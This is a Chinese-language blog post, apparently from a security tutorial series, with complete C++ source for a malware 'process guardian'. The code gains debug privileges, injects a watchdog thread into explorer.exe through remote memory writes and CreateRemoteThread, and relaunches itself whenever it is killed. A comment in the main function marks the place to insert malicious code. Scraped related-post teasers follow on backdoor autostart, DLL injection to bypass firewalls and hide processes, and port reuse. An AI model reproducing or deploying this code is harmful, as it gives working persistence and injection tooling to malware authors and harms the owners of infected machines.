安全之路 —— C++實現程序守護

阿新 • • 發佈：2019-01-01

簡介

所謂程序守護，就是A程序為了保護自己不被結束，建立了一個守護執行緒來保護自己，一旦被結束程序，便重新啟動。程序守護的方法多被應用於惡意軟體，是一個保護自己程序的一個簡單方式，在ring3下即可輕鬆實現。而建立守護執行緒的方法多采用遠端執行緒注入的方式，筆者之前曾介紹過遠端執行緒注入的基本方式，主要分為DLL遠端注入和無DLL遠端注入。

程式碼實現

//////////////////////////////////////
//
// FileName : ProcessProtectorDemo.cpp
// Creator : PeterZheng
// Date : 2018/9/06 17:32
// Comment : Process Protector
//
//////////////////////////////////////

#pragma once 


#include <cstdio>
#include <iostream>
#include <cstdlib>
#include <string.h>
#include <string>
#include <strsafe.h>
#include <Windows.h>
#include <tlhelp32.h>
#include <vector>

using namespace std;

#define MAX_LENGTH 255
#pragma warning(disable:4996) 


//遠端執行緒引數結構體
typedef struct _remoteTdParams
{
    LPVOID ZWinExec;             // WinExec Function Address
    LPVOID ZOpenProcess;         // OpenProcess Function Address
    LPVOID ZWaitForSingleObject; // WaitForSingleObject Function Address
    DWORD ZPid;                  // Param => Process id
    HANDLE ZProcessHandle;       // Param => Handle 

    CHAR filePath[MAX_LENGTH];   // Param => File Path
}RemoteParam;

//本地執行緒引數結構體
typedef struct _localTdParams
{
    CHAR remoteProcName[MAX_LENGTH];
    DWORD localPid;
    DWORD remotePid;
    HANDLE hRemoteThread;
}LocalParam;

//字串分割函式
BOOL SplitString(const string& s, vector<string>& v, const string& c)
{
    string::size_type pos1, pos2;
    pos2 = s.find(c);
    pos1 = 0;
    while (string::npos != pos2)
    {
        v.push_back(s.substr(pos1, pos2 - pos1));

        pos1 = pos2 + c.size();
        pos2 = s.find(c, pos1);
    }
    if (pos1 != s.length())
        v.push_back(s.substr(pos1));
    return TRUE;
}


//遠端執行緒函式體 (守護函式)
DWORD WINAPI ThreadProc(RemoteParam *lprp)
{
    typedef UINT(WINAPI *ZWinExec)(LPCSTR lpCmdLine, UINT uCmdShow);
    typedef HANDLE(WINAPI *ZOpenProcess)(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
    typedef DWORD(WINAPI *ZWaitForSingleObject)(HANDLE hHandle, DWORD dwMilliseconds);
    ZWinExec ZWE;
    ZOpenProcess ZOP;
    ZWaitForSingleObject ZWFSO;
    ZWE = (ZWinExec)lprp->ZWinExec;
    ZOP = (ZOpenProcess)lprp->ZOpenProcess;
    ZWFSO = (ZWaitForSingleObject)lprp->ZWaitForSingleObject;
    lprp->ZProcessHandle = ZOP(PROCESS_ALL_ACCESS, FALSE, lprp->ZPid);
    ZWFSO(lprp->ZProcessHandle, INFINITE);
    ZWE(lprp->filePath, SW_SHOW);
    return 0;
}

//獲取PID
DWORD __cdecl GetProcessID(CHAR *ProcessName)
{
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE) return 0;
    BOOL bProcess = Process32First(hProcessSnap, &pe32);
    while (bProcess)
    {
        if (strcmp(strupr(pe32.szExeFile), strupr(ProcessName)) == 0)
            return pe32.th32ProcessID;
        bProcess = Process32Next(hProcessSnap, &pe32);
    }
    CloseHandle(hProcessSnap);
    return 0;
}

//獲取許可權
int __cdecl EnableDebugPriv(const TCHAR *name)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    LUID luid;
    if (!OpenProcessToken(GetCurrentProcess(),
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
        &hToken)) return 1;
    if (!LookupPrivilegeValue(NULL, name, &luid)) return 1;
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    tp.Privileges[0].Luid = luid;
    if (!AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) return 1;
    return 0;
}

//執行緒注入函式
BOOL __cdecl InjectProcess(const DWORD dwRemotePid, const DWORD dwLocalPid, HANDLE& hThread)
{
    if (EnableDebugPriv(SE_DEBUG_NAME)) return FALSE;
    HANDLE hWnd = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwRemotePid);
    if (!hWnd) return FALSE;
    RemoteParam rp;
    ZeroMemory(&rp, sizeof(RemoteParam));
    rp.ZOpenProcess = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "OpenProcess");
    rp.ZWinExec = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "WinExec");
    rp.ZWaitForSingleObject = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "WaitForSingleObject");
    rp.ZPid = dwLocalPid;
    CHAR szPath[MAX_LENGTH] = "\0";
    GetModuleFileName(NULL, szPath, sizeof(szPath));
    StringCchCopy(rp.filePath, sizeof(rp.filePath), szPath);
    RemoteParam *pRemoteParam = (RemoteParam *)VirtualAllocEx(hWnd, 0, sizeof(RemoteParam), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!pRemoteParam) return FALSE;
    if (!WriteProcessMemory(hWnd, pRemoteParam, &rp, sizeof(RemoteParam), 0)) return FALSE;
    LPVOID pRemoteThread = VirtualAllocEx(hWnd, 0, 1024 * 4, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!pRemoteThread) return FALSE;
    if (!WriteProcessMemory(hWnd, pRemoteThread, &ThreadProc, 1024 * 4, 0)) return FALSE;
    hThread = CreateRemoteThread(hWnd, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, (LPVOID)pRemoteParam, 0, NULL);
    if (!hThread) return FALSE;
    return TRUE;
}

//遠端執行緒監控函式（本地執行緒函式）
DWORD WINAPI WatchFuncData(LPVOID lprarm)
{
    HANDLE hRemoteThread = ((LocalParam*)lprarm)->hRemoteThread;
    DWORD dwLocalPid = ((LocalParam*)lprarm)->localPid;
    DWORD dwRemotePid = ((LocalParam*)lprarm)->remotePid;
    CHAR szRemoteProcName[MAX_LENGTH] = "\0";
    StringCchCopy(szRemoteProcName, sizeof(szRemoteProcName), ((LocalParam*)lprarm)->remoteProcName);
    DWORD exitCode = 0;
    while (TRUE)
    {
        if (!hRemoteThread) InjectProcess(dwRemotePid, dwLocalPid, hRemoteThread);
        GetExitCodeThread(hRemoteThread, &exitCode);
        if (exitCode^STILL_ACTIVE)
        {
            WinExec(szRemoteProcName, SW_HIDE);
            dwRemotePid = GetProcessID(szRemoteProcName);
            InjectProcess(dwRemotePid, dwLocalPid, hRemoteThread);
        }
        Sleep(1000);
    }
    return 0;
}

//主函式
int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
{
    LocalParam lpLp;
    ZeroMemory(&lpLp, sizeof(LocalParam));
    CHAR szRemoteProcName[MAX_LENGTH] = "\0";
    CHAR szLocalProcName[MAX_LENGTH] = "\0";
    CHAR currentFilePath[MAX_LENGTH] = "\0";
    vector<string> pathGroup;
    GetModuleFileName(NULL, currentFilePath, sizeof(currentFilePath));
    SplitString(currentFilePath, pathGroup, "\\");
    StringCchCopy(szLocalProcName, sizeof(szLocalProcName), pathGroup[pathGroup.size() - 1].c_str());
    StringCchCopy(szRemoteProcName, sizeof(szRemoteProcName), "explorer.exe");
    StringCchCopy(szLocalProcName, sizeof(szLocalProcName), szLocalProcName);
    StringCchCopy(lpLp.remoteProcName, sizeof(lpLp.remoteProcName), szRemoteProcName);
    DWORD dwRemotePid = GetProcessID(szRemoteProcName);
    DWORD dwLocalPid = GetProcessID(szLocalProcName);
    HANDLE hThread = NULL;
    lpLp.remotePid = dwRemotePid;
    lpLp.localPid = dwLocalPid;
    hThread = CreateThread(NULL, 0, WatchFuncData, LPVOID(&lpLp), 0, 0);
    //....插入惡意程式碼等工作流程
    while (TRUE)
    {
        MessageBox(NULL, "Hello!!", "HAHA!! XDD", MB_OK);
    }
    WaitForSingleObject(hThread, INFINITE);
    return 0;
}

安全之路 —— C++實現程序守護

簡介所謂程序守護，就是A程序為了保護自己不被結束，建立了一個守護執行緒來保護自己，一旦被結束程序，便重新啟動。程序守護的方法多被應用於惡意軟體，是一個保護自己程序的一個簡單方式，在ring3下即可輕鬆實現。而建立守護執行緒的方法多采用遠端執行緒注入的方式，筆

安全之路 —— C++實現進程守護

之前 aps serve query value isa process read subst 簡介所謂進程守護，就是A進程為了保護自己不被結束，創建了一個守護線程來保護自己，一旦被結束進程，便重新啟動。進程守護的方法多被應用於惡意軟件，是一個保護自己進程的一個簡單方式

安全之路 —— C/C++實現後門的服務自啟動

net tom html 註冊表自啟動 bin hide any patch format 簡介 Windows NT系統後門要實現自啟動，有許多種方法，例如註冊表自啟動，映像劫持技術，SVCHost自啟動以及本章節介紹的服務自啟動等方法，其中服務自啟動相對於上述其他三種

安全之路 —— 無DLL檔案實現遠端程序注入

簡介在之前的章節中，筆者曾介紹過有關於遠端執行緒注入的知識，將後門.dll檔案注入explorer.exe中實現繞過防火牆反彈後門。但一個.exe檔案總要在注入時捎上一個.dll檔案著實是怪麻煩的，那麼有沒有什麼方法能夠不適用.dll檔案實現

安全之路 —— 藉助DLL進行遠端執行緒注入實現穿牆與隱藏程序

簡介大多數後門或病毒要想初步實現隱藏程序，即不被像工作管理員這樣典型的RING3級程序管理器找到過於明顯的不明程序，其中比較著名的方法就是通過遠端執行緒注入的方法注入將惡意程序的DLL檔案注入系統認可的正常程序，你會發現工作管理員以及找不

安全之路 —— 利用遠程線程註入的方法（使用DLL）實現穿墻與隱藏進程

pat 完整路徑 ystemd return cpi printf output inf server 簡介大多數後門或病毒要想初步實現隱藏進程，即不被像任務管理器這樣典型的RING3級進程管理器找到過於明顯的不明進程，其中比較著名的方法就是通過遠程線程註

安全之路 —— 無DLL文件實現遠程線程註入

資源管理 dir 簡介 sdn wsize date process 地址 str 簡介在之前的章節中，筆者曾介紹過有關於遠程線程註入的知識，將後門.dll文件註入explorer.exe中實現繞過防火墻反彈後門。但一個.exe文件總要在註入時捎上一個.d

安全之路 —— 利用SVCHost.exe系統服務實現後門自啟動

cas default wait cal tis lis success 放置簡介簡介在Windows系統中有一個系統服務控制器，叫做SVCHost.exe，它可以用來管理系統的多組服務。它與普通的服務控制不同的是它采用dll導出的ServiceMain主函數實現服

安全之路 —— 利用APC隊列實現跨進程註入

single obj 介紹自己 for call 經典的 rap wait 簡介在之前的文章中筆者曾經為大家介紹過使用CreateRemoteThread函數來實現遠程線程註入，毫無疑問最經典的註入方式，但也因為如此，這種方式到今天已經幾乎被所有安全軟件所防禦。所以今

GO語言的進階之路-go的程序結構以及包簡介

Python自動化3.0-------學習之路-------第一個程序用戶登錄！

hide lap 標記之路判斷 () exit isp 互信一、用戶登錄程序知識點：1.input（） 2.while 循環 3.fot 循環

Android開發學習之路--圖表實現(achartengine/MPAndroidChart)之初體驗

bundle 喜歡嵌入式linux Y軸 tid ren sca ref java代碼 ??已經有一段時間沒有更新博客了，在上周離開工作了4年的公司，從此不再安安穩穩地工作了。很多其它的是接受挑戰和實現自身價值的提高。離開了嵌入式linux，從此擁抱移

[前端小小白的學習之路]--Bable實現由ES6轉譯為ES5

all str .json blog ict true save back sta Babel是一個廣泛使用的轉碼器，可以將ES6代碼轉譯為ES5代碼，從而在現有環境下執行。舉例說明：轉譯前（ES6格式）代碼如下： let User = { name : ‘

Java進階之路——從初級程序員到架構師，從小工到專家

類型編程語言 fomat 基礎 color 使用場景霍夫曼 ebsp cal 怎樣學習才能從一名Java初級程序員成長為一名合格的架構師，或者說一名合格的架構師應該有怎樣的技術知識體系，這是不僅一個剛剛踏入職場的初級程序員也是工作三五年之後開始迷茫的老程序員經常會問到的

PYTHON自學之路_購物車程序

python while 個數字 pen clas else [1] list 輸入 1 # Author:Johnson 2 3 #啟動程序後，讓用戶輸入工資，然後打印商口列表 4 #允許用戶根據商品編號購買商品，放入購物車，可用工資減去商品價格。 5 #按

以前寫的兩本書《安全之路：Web滲透技術及實戰案例解析（第2版）》和《黑客攻防實戰加密與解密》

Web滲透技術及實戰案例解析黑客攻防實戰加密與解密應一些朋友的要求，我重新將書封面和購買地址發一下說明一下：www.antian365.com原來域名轉移到國外去了。現在國家對境外域名在國內訪問必須實名制，進行備份啥的，情況你懂的。最近正在制作《黑客攻防實戰加密與解密》的視頻課程，對黑客攻防過程遇

Python實踐之路4——實現進度條和文件內容參數替換

文件內容 imp 運行時 margin OS 效果輸出結果 wait stdout 1、文件進度條代碼需求：實現可視化，不斷增加#####的功能。代碼實現： 1 #！/user/bin/env ptyhon 2 # -*- coding:utf-8 -*- 3

安全不安全002：C#實現RSA算法加密解密

RSA C#通過前面的文章我們學會了如何生成公鑰和私鑰，詳見這篇文章：https://blog.csdn.net/yysyangyangyangshan/article/details/80368397。那麽，我們來看在C#中如何實現RSA加密解密。直接上代碼，如下類是RSA算法實現的加密，加解密，簽名以及簽

安全之路 —— 利用端口復用技術隱藏後門端口

mil *** zcm 一位標識 creator process count handle 簡介前面我們介紹到我們可以用進程註入的方法，借用其他應用的端口收發信息，從而達到穿墻的效果，那麽今天介紹一種新的方法，叫做端口復用技術，他能夠與其他應用綁定同一個端口，但同時進

Python之路 - Socketserver實現多並發

one other while 進程 sockets ket 開發 port == Python之路 - Socketserver實現多並發閱讀指引 ?? socketserver ?? 實現多並發 ?? 閱讀指引 ?? 在上面的整理篇章中 , 簡單的網絡編程

安全之路 —— C++實現程序守護

簡介

程式碼實現

相關推薦